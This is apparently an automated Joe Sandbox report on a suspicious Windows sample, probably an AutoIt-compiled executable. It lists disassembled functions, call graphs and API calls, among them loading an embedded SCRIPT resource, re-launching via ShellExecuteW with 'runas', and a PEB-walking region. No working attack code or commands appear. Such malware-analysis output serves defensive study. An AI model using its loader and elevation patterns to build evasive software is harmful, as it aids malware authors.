82 API calls __wsopen_s 99293->99358 99294->99293 99295->99293 99295->99294 99296->99293 99298->99293 99299->99293 99300->99298 99321 12dbc0 99301->99321 99302->99321 99356 13e300 23 API calls 99303->99356 99304 13e551 timeGetTime 99304->99321 99307 172c0b GetExitCodeProcess 99310 172c37 CloseHandle 99307->99310 99311 172c21 WaitForSingleObject 99307->99311 99308 1b29bf GetForegroundWindow 99308->99321 99310->99321 99311->99293 99311->99310 99312 172a31 99312->99313 99314 172ca9 Sleep 99314->99293 99319->99293 99321->99293 99321->99304 99321->99307 99321->99308 99321->99312 99321->99313 99321->99314 99359 1a5658 23 API calls 99321->99359 99360 18e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99321->99360 99361 18d4dc 47 API calls 99321->99361 99322->99293 99325 12dd83 99324->99325 99326 12dd6f 99324->99326 99363 19359c 82 API calls __wsopen_s 99325->99363 99362 12d260 256 API calls 2 library calls 99326->99362 99328 12dd7a 99328->99293 99330 172f75 99330->99330 99333 12e010 99331->99333 99332 12ec40 256 API calls 99349 12e0dc messages 99332->99349 99333->99349 99366 140242 5 API calls __Init_thread_wait 99333->99366 99336 172fca 99338 12a961 22 API calls 99336->99338 99336->99349 99337 12a961 22 API calls 99337->99349 99341 172fe4 99338->99341 99367 1400a3 29 API calls __onexit 99341->99367 99343 172fee 99368 1401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99343->99368 99346 19359c 82 API calls 99346->99349 99348 12a8c7 22 API calls 99348->99349 99349->99332 99349->99337 99349->99346 99349->99348 99350 1304f0 22 API calls 99349->99350 99351 12e3e1 99349->99351 99364 12a81b 41 API calls 99349->99364 99365 13a308 256 API calls 99349->99365 99369 140242 5 API calls __Init_thread_wait 99349->99369 99370 1400a3 29 API calls __onexit 99349->99370 99371 1401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99349->99371 99372 1a47d4 256 API calls 99349->99372 99373 1a68c1 256 API calls 99349->99373 99350->99349 99351->99293 99354->99293 99355->99293 99356->99293 99357->99293 99358->99293 99359->99321 99360->99321 99361->99321 99362->99328 99363->99330 99364->99349 99365->99349 99366->99336 99367->99343 99368->99349 99369->99349 99370->99349 99371->99349 99372->99349 99373->99349 99374 12dee5 99377 12b710 99374->99377 99378 12b72b 99377->99378 99379 170146 99378->99379 99380 1700f8 99378->99380 99392 12b750 99378->99392 99419 1a58a2 256 API calls 2 library calls 99379->99419 99383 170102 99380->99383 99386 17010f 99380->99386 99380->99392 99417 1a5d33 256 API calls 99383->99417 99403 12ba20 99386->99403 99418 1a61d0 256 API calls 2 library calls 99386->99418 99389 1703d9 99389->99389 99391 12bbe0 40 API calls 99391->99392 99392->99391 99395 170322 99392->99395 99399 12ba4e 99392->99399 99392->99403 99404 13d336 40 API calls 99392->99404 99405 12ec40 256 API calls 99392->99405 99406 12a8c7 22 API calls 99392->99406 99408 12a81b 41 API calls 99392->99408 99409 13d2f0 40 API calls 99392->99409 99410 13a01b 256 API calls 99392->99410 99411 140242 5 API calls __Init_thread_wait 99392->99411 99412 13edcd 22 API calls 99392->99412 99413 1400a3 29 API calls __onexit 99392->99413 99414 1401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99392->99414 99415 13ee53 82 API calls 99392->99415 99416 13e5ca 256 API calls 99392->99416 99420 12aceb 23 API calls messages 99392->99420 99421 17f6bf 23 API calls 99392->99421 99422 1a5c0c 82 API calls 99395->99422 99403->99399 99423 19359c 82 API calls __wsopen_s 99403->99423 99404->99392 99405->99392 99406->99392 99408->99392 99409->99392 99410->99392 99411->99392 99412->99392 99413->99392 99414->99392 99415->99392 99416->99392 99417->99386 99418->99403 99419->99392 99420->99392 99421->99392 99422->99403 99423->99389 99424 23c24e0 99438 23c0000 99424->99438 99426 23c25c9 99441 23c2300 99426->99441 99444 23c3650 GetPEB 99438->99444 99440 23c068b 99440->99426 99442 23c230d Sleep 99441->99442 99443 23c231c 99442->99443 99445 23c367a 99444->99445 99445->99440 99446 121cad SystemParametersInfoW

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 234 1242de-12434d call 12a961 GetVersionExW call 126b57 239 163617-16362a 234->239 240 124353 234->240 242 16362b-16362f 239->242 241 124355-124357 240->241 245 163656 241->245 246 12435d-1243bc call 1293b2 call 1237a0 241->246 243 163632-16363e 242->243 244 163631 242->244 243->242 247 163640-163642 243->247 244->243 250 16365d-163660 245->250 263 1243c2-1243c4 246->263 264 1637df-1637e6 246->264 247->241 249 163648-16364f 247->249 249->239 252 163651 249->252 253 163666-1636a8 250->253 254 12441b-124435 GetCurrentProcess IsWow64Process 250->254 252->245 253->254 258 1636ae-1636b1 253->258 256 124437 254->256 257 124494-12449a 254->257 260 12443d-124449 256->260 257->260 261 1636b3-1636bd 258->261 262 1636db-1636e5 258->262 265 163824-163828 GetSystemInfo 260->265 266 12444f-12445e LoadLibraryA 260->266 267 1636bf-1636c5 261->267 268 1636ca-1636d6 261->268 270 1636e7-1636f3 262->270 271 1636f8-163702 262->271 263->250 269 1243ca-1243dd 263->269 272 163806-163809 264->272 273 1637e8 264->273 279 124460-12446e GetProcAddress 266->279 280 12449c-1244a6 GetSystemInfo 266->280 267->254 268->254 281 163726-16372f 269->281 282 1243e3-1243e5 269->282 270->254 275 163704-163710 271->275 276 163715-163721 271->276 277 1637f4-1637fc 272->277 278 16380b-16381a 272->278 274 1637ee 273->274 274->277 275->254 276->254 277->272 278->274 287 16381c-163822 278->287 279->280 288 124470-124474 GetNativeSystemInfo 279->288 289 124476-124478 280->289 285 163731-163737 281->285 286 16373c-163748 281->286 283 1243eb-1243ee 282->283 284 16374d-163762 282->284 290 1243f4-12440f 283->290 291 163791-163794 283->291 292 163764-16376a 284->292 293 16376f-16377b 284->293 285->254 286->254 287->277 288->289 294 124481-124493 289->294 295 12447a-12447b FreeLibrary 289->295 296 163780-16378c 290->296 297 124415 290->297 291->254 298 16379a-1637c1 291->298 292->254 293->254 295->294 296->254 297->254 299 1637c3-1637c9 298->299 300 1637ce-1637da 298->300 299->254 300->254
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 0012430D
                                                            • Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A
                                                          • GetCurrentProcess.KERNEL32(?,001BCB64,00000000,?,?), ref: 00124422
                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 00124429
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00124454
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00124466
                                                          • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00124474
                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0012447B
                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 001244A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                          • API String ID: 3290436268-3101561225
                                                          • Opcode ID: 094d5065cd22ef47083324d3f19056398abc39ddffeb0dfe0a247fc48ad413b5
                                                          • Instruction ID: c3abdf9cafdb8af11f0f7afc84eb00937c5d64955fef9d13245526c9bbe6eb49
                                                          • Opcode Fuzzy Hash: 094d5065cd22ef47083324d3f19056398abc39ddffeb0dfe0a247fc48ad413b5
                                                          • Instruction Fuzzy Hash: B1A1B37690A6D4FFC715D76EBC411B57FE47B36320B084899E08593E22D33046D8CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 644 1242a2-1242ba CreateStreamOnHGlobal 645 1242da-1242dd 644->645 646 1242bc-1242d3 FindResourceExW 644->646 647 1242d9 646->647 648 1635ba-1635c9 LoadResource 646->648 647->645 648->647 649 1635cf-1635dd SizeofResource 648->649 649->647 650 1635e3-1635ee LockResource 649->650 650->647 651 1635f4-163612 650->651 651->647
                                                          APIs
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001250AA,?,?,00000000,00000000), ref: 001242B2
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001250AA,?,?,00000000,00000000), ref: 001242C9
                                                          • LoadResource.KERNEL32(?,00000000,?,?,001250AA,?,?,00000000,00000000,?,?,?,?,?,?,00124F20), ref: 001635BE
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,001250AA,?,?,00000000,00000000,?,?,?,?,?,?,00124F20), ref: 001635D3
                                                          • LockResource.KERNEL32(001250AA,?,?,001250AA,?,?,00000000,00000000,?,?,?,?,?,?,00124F20,?), ref: 001635E6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: 428f94272fb98f860a886bb5abb16683bc1f49af0b26e72421e9e5e72ac88bed
                                                          • Instruction ID: 44bdfd9a02c21108202be6c8007d177767eb84ad469f7dbed625fd358e31d01f
                                                          • Opcode Fuzzy Hash: 428f94272fb98f860a886bb5abb16683bc1f49af0b26e72421e9e5e72ac88bed
                                                          • Instruction Fuzzy Hash: FF118E70200700FFDB218B66EC88F677BB9EBC5B51F104269F442D6650DB71DC508A70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00122B6B
                                                            • Part of subcall function 00123A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001F1418,?,00122E7F,?,?,?,00000000), ref: 00123A78
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                          • GetForegroundWindow.USER32(runas,?,?,?,?,?,001E2224), ref: 00162C10
                                                          • ShellExecuteW.SHELL32(00000000,?,?,001E2224), ref: 00162C17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                          • String ID: runas
                                                          • API String ID: 448630720-4000483414
                                                          • Opcode ID: c5ec067d24fef55f78927d9406b3ef14b227278de813bcc58aef1364ebcea5ce
                                                          • Instruction ID: 13cc40922d181e24f18e94405c1b5990521fe766122b97fa18f898588cbca6c3
                                                          • Opcode Fuzzy Hash: c5ec067d24fef55f78927d9406b3ef14b227278de813bcc58aef1364ebcea5ce
                                                          • Instruction Fuzzy Hash: E711D031208369BAC714FF64F8529BEB7A4ABF5304F48082DF196570A2CF358A69C752
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00165222), ref: 0018DBCE
                                                          • GetFileAttributesW.KERNELBASE(?), ref: 0018DBDD
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 0018DBEE
                                                          • FindClose.KERNEL32(00000000), ref: 0018DBFA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                          • String ID:
                                                          • API String ID: 2695905019-0
                                                          • Opcode ID: 349ee09e52d48fc40039ea9e3a32fe9931e0a378abf712e8b2c89ab58f408f8a
                                                          • Instruction ID: 5e48f3aa2cb15e881530ff6bc6688ba545e74059be4e7eee4e7dbbbc4e2ee290
                                                          • Opcode Fuzzy Hash: 349ee09e52d48fc40039ea9e3a32fe9931e0a378abf712e8b2c89ab58f408f8a
                                                          • Instruction Fuzzy Hash: 46F0E530810A10578220BB7CFC0D8AA376D9F06334B10474AF836C24F0EBB05E94CBD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetInputState.USER32 ref: 0012D807
                                                          • timeGetTime.WINMM ref: 0012DA07
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012DB28
                                                          • TranslateMessage.USER32(?), ref: 0012DB7B
                                                          • DispatchMessageW.USER32(?), ref: 0012DB89
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012DB9F
                                                          • Sleep.KERNEL32(0000000A), ref: 0012DBB1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                          • String ID:
                                                          • API String ID: 2189390790-0
                                                          • Opcode ID: 88102c795f934aa9fecd52c39816b91e44372fdb5c881b83d95af5d32d8659b4
                                                          • Instruction ID: 5fbac00f0ab5aa4b80b54d1ab99c312fbbd7cdbe14c26c3f1dcd48437d549485
                                                          • Opcode Fuzzy Hash: 88102c795f934aa9fecd52c39816b91e44372fdb5c881b83d95af5d32d8659b4
                                                          • Instruction Fuzzy Hash: CA421230608351EFDB29CF24E894BAAB7F0BF56304F54861DF49987691D770E8A5CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00122D07
                                                          • RegisterClassExW.USER32(00000030), ref: 00122D31
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00122D42
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00122D5F
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00122D6F
                                                          • LoadIconW.USER32(000000A9), ref: 00122D85
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00122D94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 815abbf8c29f38405c78b3f812b25213b98634304f556c88481c48e2cd4faff1
                                                          • Instruction ID: 480ce2e535d55373855baa6a6b56fa9c8e3af5b7d9707089fa7b93dd1da49f4c
                                                          • Opcode Fuzzy Hash: 815abbf8c29f38405c78b3f812b25213b98634304f556c88481c48e2cd4faff1
                                                          • Instruction Fuzzy Hash: F821C2B5911318EFDB00DFA4ED89BEDBBB8FB48704F10821AF551A66A0D7B14584CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 302 16065b-16068b call 16042f 305 1606a6-1606b2 call 155221 302->305 306 16068d-160698 call 14f2c6 302->306 312 1606b4-1606c9 call 14f2c6 call 14f2d9 305->312 313 1606cb-160714 call 16039a 305->313 311 16069a-1606a1 call 14f2d9 306->311 323 16097d-160983 311->323 312->311 321 160716-16071f 313->321 322 160781-16078a GetFileType 313->322 325 160756-16077c GetLastError call 14f2a3 321->325 326 160721-160725 321->326 327 1607d3-1607d6 322->327 328 16078c-1607bd GetLastError call 14f2a3 CloseHandle 322->328 325->311 326->325 331 160727-160754 call 16039a 326->331 329 1607df-1607e5 327->329 330 1607d8-1607dd 327->330 328->311 339 1607c3-1607ce call 14f2d9 328->339 335 1607e9-160837 call 15516a 329->335 336 1607e7 329->336 330->335 331->322 331->325 345 160847-16086b call 16014d 335->345 346 160839-160845 call 1605ab 335->346 336->335 339->311 351 16087e-1608c1 345->351 352 16086d 345->352 346->345 353 16086f-160879 call 1586ae 346->353 355 1608e2-1608f0 351->355 356 1608c3-1608c7 351->356 352->353 353->323 359 1608f6-1608fa 355->359 360 16097b 355->360 356->355 358 1608c9-1608dd 356->358 358->355 359->360 361 1608fc-16092f CloseHandle call 16039a 359->361 360->323 364 160963-160977 361->364 365 160931-16095d GetLastError call 14f2a3 call 155333 361->365 364->360 365->364
                                                          APIs
                                                            • Part of subcall function 0016039A: CreateFileW.KERNELBASE(00000000,00000000,?,00160704,?,?,00000000,?,00160704,00000000,0000000C), ref: 001603B7
                                                          • GetLastError.KERNEL32 ref: 0016076F
                                                          • __dosmaperr.LIBCMT ref: 00160776
                                                          • GetFileType.KERNELBASE(00000000), ref: 00160782
                                                          • GetLastError.KERNEL32 ref: 0016078C
                                                          • __dosmaperr.LIBCMT ref: 00160795
                                                          • CloseHandle.KERNEL32(00000000), ref: 001607B5
                                                          • CloseHandle.KERNEL32(?), ref: 001608FF
                                                          • GetLastError.KERNEL32 ref: 00160931
                                                          • __dosmaperr.LIBCMT ref: 00160938
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: 335d69e18a42338af309658d0e42e819a123c4dea79ca9814d676ad39775d564
                                                          • Instruction ID: e2867b5e823ceb5364be7310ed73f231896a4592033f1823b48f3e161ed94cb8
                                                          • Opcode Fuzzy Hash: 335d69e18a42338af309658d0e42e819a123c4dea79ca9814d676ad39775d564
                                                          • Instruction Fuzzy Hash: B9A11432A141048FDF1AEF68DC51BAE7BA1AB5A320F14015DF8159B3E2DB319D62CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00123A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001F1418,?,00122E7F,?,?,?,00000000), ref: 00123A78
                                                            • Part of subcall function 00123357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00123379
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0012356A
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0016318D
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001631CE
                                                          • RegCloseKey.ADVAPI32(?), ref: 00163210
                                                          • _wcslen.LIBCMT ref: 00163277
                                                          • _wcslen.LIBCMT ref: 00163286
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 98802146-2727554177
                                                          • Opcode ID: 3428f2b30c70bfbd5a3e1dd3f3e296dc787c0a1326c25d27c72d090a683fc91a
                                                          • Instruction ID: 84fee739e0e0532ad9546320e908a0b8789c5f48a9eaf749980263bed34c074d
                                                          • Opcode Fuzzy Hash: 3428f2b30c70bfbd5a3e1dd3f3e296dc787c0a1326c25d27c72d090a683fc91a
                                                          • Instruction Fuzzy Hash: 3771D2B15043059FC314EF29EC819ABBBE8FFA8340F40042EF555D71A0EB349A99CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00122B8E
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00122B9D
                                                          • LoadIconW.USER32(00000063), ref: 00122BB3
                                                          • LoadIconW.USER32(000000A4), ref: 00122BC5
                                                          • LoadIconW.USER32(000000A2), ref: 00122BD7
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00122BEF
                                                          • RegisterClassExW.USER32(?), ref: 00122C40
                                                            • Part of subcall function 00122CD4: GetSysColorBrush.USER32(0000000F), ref: 00122D07
                                                            • Part of subcall function 00122CD4: RegisterClassExW.USER32(00000030), ref: 00122D31
                                                            • Part of subcall function 00122CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00122D42
                                                            • Part of subcall function 00122CD4: InitCommonControlsEx.COMCTL32(?), ref: 00122D5F
                                                            • Part of subcall function 00122CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00122D6F
                                                            • Part of subcall function 00122CD4: LoadIconW.USER32(000000A9), ref: 00122D85
                                                            • Part of subcall function 00122CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00122D94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: ba04e8aa6ee6eac30aa7a3d7cca2afc11f116d722b8e9a7c0c7afb80d731c398
                                                          • Instruction ID: 85aa39fef47288882a148a41836c28f3d7f06b0d1506231f1fdecd2b003aa786
                                                          • Opcode Fuzzy Hash: ba04e8aa6ee6eac30aa7a3d7cca2afc11f116d722b8e9a7c0c7afb80d731c398
                                                          • Instruction Fuzzy Hash: 80212C70E00315FBDB109FA6EC95AAD7FB4FB88B60F04011AF500A6AA0D7B10594CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 443 123170-123185 444 123187-12318a 443->444 445 1231e5-1231e7 443->445 446 1231eb 444->446 447 12318c-123193 444->447 445->444 448 1231e9 445->448 452 1231f1-1231f6 446->452 453 162dfb-162e23 call 1218e2 call 13e499 446->453 449 123265-12326d PostQuitMessage 447->449 450 123199-12319e 447->450 451 1231d0-1231d8 DefWindowProcW 448->451 460 123219-12321b 449->460 457 1231a4-1231a8 450->457 458 162e7c-162e90 call 18bf30 450->458 459 1231de-1231e4 451->459 454 1231f8-1231fb 452->454 455 12321d-123244 SetTimer RegisterWindowMessageW 452->455 488 162e28-162e2f 453->488 461 123201-123214 KillTimer call 1230f2 call 123c50 454->461 462 162d9c-162d9f 454->462 455->460 464 123246-123251 CreatePopupMenu 455->464 465 1231ae-1231b3 457->465 466 162e68-162e77 call 18c161 457->466 458->460 482 162e96 458->482 460->459 461->460 474 162dd7-162df6 MoveWindow 462->474 475 162da1-162da5 462->475 464->460 471 162e4d-162e54 465->471 472 1231b9-1231be 465->472 466->460 471->451 476 162e5a-162e63 call 180ad7 471->476 480 123253-123263 call 12326f 472->480 481 1231c4-1231ca 472->481 474->460 483 162dc6-162dd2 SetFocus 475->483 484 162da7-162daa 475->484 476->451 480->460 481->451 481->488 482->451 483->460 484->481 489 162db0-162dc1 call 1218e2 484->489 488->451 493 162e35-162e48 call 1230f2 call 123837 488->493 489->460 493->451
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0012316A,?,?), ref: 001231D8
                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,0012316A,?,?), ref: 00123204
